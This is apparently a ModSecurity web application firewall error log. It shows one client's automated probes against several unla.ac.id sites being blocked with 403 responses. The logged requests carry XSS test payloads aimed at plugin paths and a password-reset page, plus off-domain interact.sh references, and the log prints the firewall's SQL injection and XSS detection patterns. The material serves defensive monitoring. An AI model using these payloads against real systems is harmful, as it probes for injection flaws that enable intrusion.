[Tue Aug 29 11:51:59.575794 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date-from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:date-from: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/date_select.php"] [unique_id "ZO15b8Co-f0AAAnIlmYAAAAV"]
[Tue Aug 29 11:51:59.591044 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/echo-server.html"] [unique_id "ZO15b8Co-f0AAAn958wAAAAD"]
[Tue Aug 29 11:51:59.594755 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/echo-server.html"] [unique_id "ZO15b8Co-f0AAAm7nEoAAAAE"]
[Tue Aug 29 11:51:59.604076 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:cyclePeriod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:cyclePeriod: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/plugins/servlet/Wallboard/"] [unique_id "ZO15b8Co-f0AAAnIlmcAAAAV"]
[Tue Aug 29 11:52:00.562437 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date-from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:date-from: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/date_select.php"] [unique_id "ZO15cMCo-f0AAAnd3DAAAAAI"]
[Tue Aug 29 11:52:00.565397 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/echo-server.html"] [unique_id "ZO15cMCo-f0AAAn40x8AAAAW"]
[Tue Aug 29 11:52:01.559933 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bundle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:bundle: ';alert(document.domain);var ok='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/passwordreset"] [unique_id "ZO15ccCo-f0AAAlUloMAAAA0"]
[Tue Aug 29 11:52:01.570858 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bundle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:bundle: ';alert(document.domain);var ok='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/passwordreset"] [unique_id "ZO15ccCo-f0AAAn9588AAAAD"]
[Tue Aug 29 11:52:01.576708 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bundle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:bundle: ';alert(document.domain);var ok='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/passwordreset"] [unique_id "ZO15ccCo-f0AAAnn1-oAAAAe"]
[Tue Aug 29 11:52:01.583139 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bundle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:bundle: ';alert(document.domain);var ok='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/passwordreset"] [unique_id "ZO15ccCo-f0AAAm7nE0AAAAE"]
[Tue Aug 29 11:52:01.596435 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bundle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:bundle: ';alert(document.domain);var ok='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/passwordreset"] [unique_id "ZO15ccCo-f0AAAnn1-sAAAAe"]
[Tue Aug 29 11:52:02.565407 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search_title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search_title: \\x22><img src=x onerror=alert(domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plugins/jobsearch/"] [unique_id "ZO15csCo-f0AAAjdQZMAAAAZ"]
[Tue Aug 29 11:52:02.569693 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search_title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search_title: \\x22><img src=x onerror=alert(domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plugins/jobsearch/"] [unique_id "ZO15csCo-f0AAAfWOKMAAAAL"]
[Tue Aug 29 11:52:02.630190 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search_title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search_title: \\x22><img src=x onerror=alert(domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/jobsearch/"] [unique_id "ZO15csCo-f0AAAnn1-0AAAAe"]
[Tue Aug 29 11:52:02.691186 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search_title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search_title: \\x22><img src=x onerror=alert(domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plugins/jobsearch/"] [unique_id "ZO15csCo-f0AAAm7nE8AAAAE"]
[Tue Aug 29 11:52:02.713169 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:contactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:contactId: contactId'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php"] [unique_id "ZO15csCo-f0AAAlUlocAAAA0"]
[Tue Aug 29 11:52:02.719085 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wbm/login/"] [unique_id "ZO15csCo-f0AAAm7nFAAAAAE"]
[Tue Aug 29 11:52:02.722937 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wbm/login/"] [unique_id "ZO15csCo-f0AAAn0GZwAAAAa"]
[Tue Aug 29 11:52:02.760453 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wbm/login/"] [unique_id "ZO15csCo-f0AAAn40yUAAAAW"]
[Tue Aug 29 11:52:02.762431 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:search_term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:search_term: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15csCo-f0AAAn0GZ0AAAAa"]
[Tue Aug 29 11:52:02.784299 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wbm/login/"] [unique_id "ZO15csCo-f0AAAnd3DcAAAAI"]
[Tue Aug 29 11:52:02.799595 2023] [:error] [pid 2529] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:search_term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:search_term: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15csCo-f0AAAnh6PAAAAAS"]
[Tue Aug 29 11:52:02.800474 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:search_term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:search_term: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15csCo-f0AAAnIlm8AAAAV"]
[Tue Aug 29 11:52:02.803463 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:contactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:contactId: contactId'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php"] [unique_id "ZO15csCo-f0AAAjdQZYAAAAZ"]
[Tue Aug 29 11:52:02.804676 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:search_term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:search_term: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15csCo-f0AAAlIBi8AAAAn"]
[Tue Aug 29 11:52:02.805236 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:search_term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:search_term: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15csCo-f0AAAlUlokAAAA0"]
[Tue Aug 29 11:52:02.805724 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:contactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:contactId: contactId'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php"] [unique_id "ZO15csCo-f0AAAhoHTUAAAAl"]
[Tue Aug 29 11:52:02.826814 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:contactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:contactId: contactId'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php"] [unique_id "ZO15csCo-f0AAAlIBjAAAAAn"]
[Tue Aug 29 11:52:02.846994 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:contactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:contactId: contactId'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php"] [unique_id "ZO15csCo-f0AAAlIBjEAAAAn"]
